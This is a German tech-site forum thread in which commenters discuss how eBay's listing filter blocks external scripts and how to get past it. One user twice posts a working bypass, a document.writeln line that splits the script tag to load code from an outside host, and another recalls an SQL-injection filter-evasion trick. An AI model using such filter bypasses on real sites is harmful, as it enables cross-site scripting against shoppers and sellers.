Abo
  1. Foren
  2. Kommentare
  3. Software-Entwicklung
  4. Alle Kommentare zum Artikel
  5. › JSFuck: Esoterischer…

Externe Scripte, das geht viel einfacher!

  1. Thema

Neues Thema Ansicht wechseln


  1. Externe Scripte, das geht viel einfacher!

    Autor: RienNeVaPlus 03.02.16 - 00:06

    Da genügt schon ein
    <script> document.writeln('<sc'+'ript src="http://externalsource"></'+'sc'+'ript>'); </script>

    um den Parser 'auszutrichsen'. Ich habe das selbst schon so verwendet.
    Oder missverstehe ich das, warum der Umweg über JSFuck?



    1 mal bearbeitet, zuletzt am 03.02.16 00:06 durch RienNeVaPlus.

  2. Re: Externe Scripte, das geht viel einfacher!

    Autor: Wildfire 03.02.16 - 07:12

    RienNeVaPlus schrieb:
    --------------------------------------------------------------------------------
    > Da genügt schon ein
    > document.writeln('</'+'sc'+'ript>');
    >
    > um den Parser 'auszutrichsen'. Ich habe das selbst schon so verwendet.
    > Oder missverstehe ich das, warum der Umweg über JSFuck?

    Vermutlich, weil der Filter von Ebay XSS-Attacken in diesem externen JS erkennen und neutralisieren würde. Mit JSFuck könntest du die XSS-Attacke aber vor dem Filter verstecken.

  3. Re: Externe Scripte, das geht viel einfacher!

    Autor: kayozz 03.02.16 - 08:45

    RienNeVaPlus schrieb:
    --------------------------------------------------------------------------------
    > Da genügt schon ein
    > document.writeln('</'+'sc'+'ript>');
    >
    > um den Parser 'auszutrichsen'. Ich habe das selbst schon so verwendet.
    > Oder missverstehe ich das, warum der Umweg über JSFuck?

    Naja, wenn der Parser Javascript rausfiltert, wird document.writeln wohl nicht durchkommen. Ausserdem hast du damit keine Change gegen CSP.

  4. Re: Externe Scripte, das geht viel einfacher!

    Autor: frostbitten king 03.02.16 - 11:04

    Wenn deren Filter dilletantisch implementiert ist? Wer weiß.

  5. Re: Externe Scripte, das geht viel einfacher!

    Autor: crazypsycho 03.02.16 - 19:35

    RienNeVaPlus schrieb:
    --------------------------------------------------------------------------------
    > Da genügt schon ein
    > document.writeln('</'+'sc'+'ript>');
    >
    > um den Parser 'auszutrichsen'. Ich habe das selbst schon so verwendet.
    > Oder missverstehe ich das, warum der Umweg über JSFuck?


    Die Frage ist, warum Ebay überhaupt Javascript erlaubt.

  6. Re: Externe Scripte, das geht viel einfacher!

    Autor: RienNeVaPlus 03.02.16 - 21:10

    Das ist er. Er blockt lediglich offensichtlich extern eingebundene Inhalte á la:
    <script src="external"></script> // -> UNGÜLTIGES ATTRIBUTE "SRC"

    Wohingegen der folgende Code problemslos ausgeführt wird:
    <script> document.writeln('<sc'+'ript src="http://externalsource"></'+'sc'+'ript>'); </script>

    Könnt ihr gerne mal ausprobieren.

  7. Re: Externe Scripte, das geht viel einfacher!

    Autor: M.P. 04.02.16 - 09:55

    "document.writeln" zuzulassen ist in diesem Fall die Sicherheitslücke.
    Das, was da geschrieben wird, kann man schon verschleiern...

    Dann noch Javascript zu blockieren, bleibt dann Sache der Einstellungen des Browsers.

    Und bei eigenem Javascript bekleckert sich Ebay ja auch nicht mit Ruhm:
    Wieso muss der aus so vielen unterschiedlichen Ebay-Domänen geladen werden?

    ebayrtm.com
    ebaystatic.com
    ebay.com
    ebay.de
    ...
    wenn dann jemand böswillige Skripte unter "ebaycontent.net" abrufbar macht, wird wohl manch einer nicht stutzen und bei NoScript die Erlaubnis erteilen....

  8. Re: Externe Scripte, das geht viel einfacher!

    Autor: frostbitten king 04.02.16 - 10:55

    Rofl, das tut weh. Vor allem, dass das geht: '<sc'+'ript .
    Kann mich erinnern bei einer Security Übung wo es um SQL Injection Filter Evation ging (ua), bist um den filter mit sowas herum gekommen:
    o;r (der Filter hat das ; gelöscht) und dann daraus OR gemacht ..baaam.
    Hätte nicht gedacht, dass in der Realität (ok sc+ript ist bissl anders aber ähnlich bescheuert).

  9. Re: Externe Scripte, das geht viel einfacher!

    Autor: crazypsycho 04.02.16 - 18:32

    M.P. schrieb:
    --------------------------------------------------------------------------------
    > "document.writeln" zuzulassen ist in diesem Fall die Sicherheitslücke.
    > Das, was da geschrieben wird, kann man schon verschleiern...

    Die Sicherheitslücke ist das <script erlaubt ist.

    > Und bei eigenem Javascript bekleckert sich Ebay ja auch nicht mit Ruhm:
    > Wieso muss der aus so vielen unterschiedlichen Ebay-Domänen geladen
    > werden?

    Ein Browser baut nur begrenzt gleichzeitige Verbindungen zu einer Domain auf. Da macht es durchaus Sinn das zu trennen.

    > wenn dann jemand böswillige Skripte unter "ebaycontent.net" abrufbar macht,
    > wird wohl manch einer nicht stutzen und bei NoScript die Erlaubnis
    > erteilen....

    NoScript ist auch ein Tool für Profis.

  10. Re: Externe Scripte, das geht viel einfacher!

    Autor: M.P. 05.02.16 - 10:51

    crazypsycho schrieb:
    --------------------------------------------------------------------------------
    > .... Die Sicherheitslücke ist das <script erlaubt ist. ....

    Wer kann es denn verbieten?
    Der Webserver von Ebay?
    Direkt geht das doch nicht. Nur indirekt durch Analyse der ausgelieferten Webseite. Die tun ja ihr bestes, um Skripte aus dem von den ebay-Anbietern erstellten Content auszufiltern.
    Wenn die Anbieter aber immer perfidere Ideen haben, das <script... Tag zu verschleiern, ist das ein Katz und Maus - Spiel.

    Wobei Ebay das anziehende Tempo des Spiels wohl nur unwillig mitgeht...

  11. Re: Externe Scripte, das geht viel einfacher!

    Autor: M.P. 05.02.16 - 13:16

    War wohl etwas vorschnell in der Analyse

    ...document.writeln ist ja schon selber javascript - wenn auch lokales...
    Man sollte nur eine Verlinkung auf internen vorgefertigten ebay-javascript-Bibliotheken zulassen. Lokaler skript-code auf der Seite ist per se verboten.
    Braucht ein Händler eigene Skripte, kann er gegen Bezahlung die skripte bei Ebay einreichen, die die in eine persönliche Skriptbibliothek (nach prüfung) abrufbar machen....

  12. Re: Externe Scripte, das geht viel einfacher!

    Autor: crazypsycho 05.02.16 - 19:06

    M.P. schrieb:
    --------------------------------------------------------------------------------
    > crazypsycho schrieb:
    > ---------------------------------------------------------------------------
    > -----
    > > .... Die Sicherheitslücke ist das <script erlaubt ist. ....
    >
    > Wer kann es denn verbieten?
    > Der Webserver von Ebay?
    > Direkt geht das doch nicht. Nur indirekt durch Analyse der ausgelieferten
    > Webseite. Die tun ja ihr bestes, um Skripte aus dem von den ebay-Anbietern
    > erstellten Content auszufiltern.
    > Wenn die Anbieter aber immer perfidere Ideen haben, das <script... Tag zu
    > verschleiern, ist das ein Katz und Maus - Spiel.
    >
    > Wobei Ebay das anziehende Tempo des Spiels wohl nur unwillig mitgeht...

    Das script-Tag rauszufiltern ist technisch auf Serverseite überhaupt kein Problem.
    PHP bietet dazu bspw eine fertige Funktion an.
    Problem ist, dass ebay Javascript an sich duldet, nur eben nicht von externen Quellen.

  1. Thema

Neues Thema Ansicht wechseln


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Zum Login

Stellenmarkt
  1. assona GmbH, Berlin
  2. Computacenter AG & Co. oHG, verschiedene Standorte
  3. VSE Aktiengesellschaft, Saarbrücken
  4. DLR Deutsches Zentrum für Luft- und Raumfahrt e.V., Köln

Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Hardware-Angebote
  1. 114,99€ (Release am 5. Dezember)
  2. 274,00€
  3. 239,00€
  4. 349,00€


Haben wir etwas übersehen?

E-Mail an news@golem.de


In eigener Sache: Golem.de bietet Seminar zu TLS an
In eigener Sache
Golem.de bietet Seminar zu TLS an

Der Verschlüsselungsexperte und Golem.de-Redakteur Hanno Böck gibt einen Workshop zum wichtigsten Verschlüsselungsprotokoll im Netz. Am 24. und 25. September klärt er Admins, Pentester und IT-Sicherheitsexperten in Berlin über Funktionsweisen und Gefahren von TLS auf.

  1. In eigener Sache Zweiter Termin für Kubernetes-Seminar
  2. Leserumfrage Wie können wir dich unterstützen?
  3. In eigener Sache Was du schon immer über Kubernetes wissen wolltest

Erasure Coding: Das Ende von Raid kommt durch Mathematik
Erasure Coding
Das Ende von Raid kommt durch Mathematik

In vielen Anwendungsszenarien sind Raid-Systeme mittlerweile nicht mehr die optimale Lösung. Zu langsam und starr sind sie. Abhilfe schaffen können mathematische Verfahren wie Erasure Coding. Noch existieren für beide Techniken Anwendungsgebiete. Am Ende wird Raid aber wohl verschwinden.
Eine Analyse von Oliver Nickel

  1. Agentur für Cybersicherheit Cyberwaffen-Entwicklung zieht in den Osten Deutschlands
  2. Yahoo Richterin lässt Vergleich zu Datenleck platzen

Ryzen 3900X/3700X im Test: AMDs 7-nm-CPUs lassen Intel hinter sich
Ryzen 3900X/3700X im Test
AMDs 7-nm-CPUs lassen Intel hinter sich

Das beste Prozessor-Design seit dem Athlon 64: Mit den Ryzen 3000 alias Matisse bringt AMD sehr leistungsstarke und Energie-effiziente CPUs zu niedrigen Preisen in den Handel. Obendrein laufen die auch auf zwei Jahre alten sowie günstigen Platinen mit schnellem DDR4-Speicher.
Ein Test von Marc Sauter

  1. Ryzen 3000 BIOS-Updates schalten PCIe Gen4 für ältere Boards frei
  2. Mehr Performance Windows 10 v1903 hat besseren Ryzen-Scheduler
  3. Picasso für Sockel AM4 AMD verlötet Ryzen 3400G für flottere iGPU

  1. Ursula von der Leyen: Von "Zensursula" zur EU-Kommissionspräsidentin
    Ursula von der Leyen
    Von "Zensursula" zur EU-Kommissionspräsidentin

    Nach der "Rede ihres Lebens" hat das Europäische Parlament am Dienstagabend Ursula von der Leyen an die Spitze der EU-Kommission gewählt. Die Christdemokratin will sich in ihrem neuen Amt binnen 100 Tagen für einen Ethik-Rahmen für KI und ambitioniertere Klimaziele stark machen. Den Planeten retten, lautet ihr ganz großer Vorsatz.

  2. Kryptowährung: Facebook möchte Kritik an Libra ausräumen
    Kryptowährung
    Facebook möchte Kritik an Libra ausräumen

    Facebooks geplante Digitalwährung Libra kommt in der Politik nicht gut an. Bei einer Anhörung vor dem US-Senat verteidigt Facebook-Manager David Marcus die Währung. Bundesregierung und Bundesbank wollen sie lieber verhindern.

  3. PC Engine Core Grafx: Konami kündigt drei Versionen der gleichen Minikonsole an
    PC Engine Core Grafx
    Konami kündigt drei Versionen der gleichen Minikonsole an

    In Europa heißt sie PC Engine Core Grafx Mini, für Japan und die USA hat Konami andere Namen und ein anderes Design. Die Retrokiste soll im März 2020 mit rund 50 vorinstallierten Spielen erscheinen. Der Kauf in Deutschland läuft minimal komplizierter ab als üblich.


  1. 20:10

  2. 18:33

  3. 17:23

  4. 16:37

  5. 15:10

  6. 14:45

  7. 14:25

  8. 14:04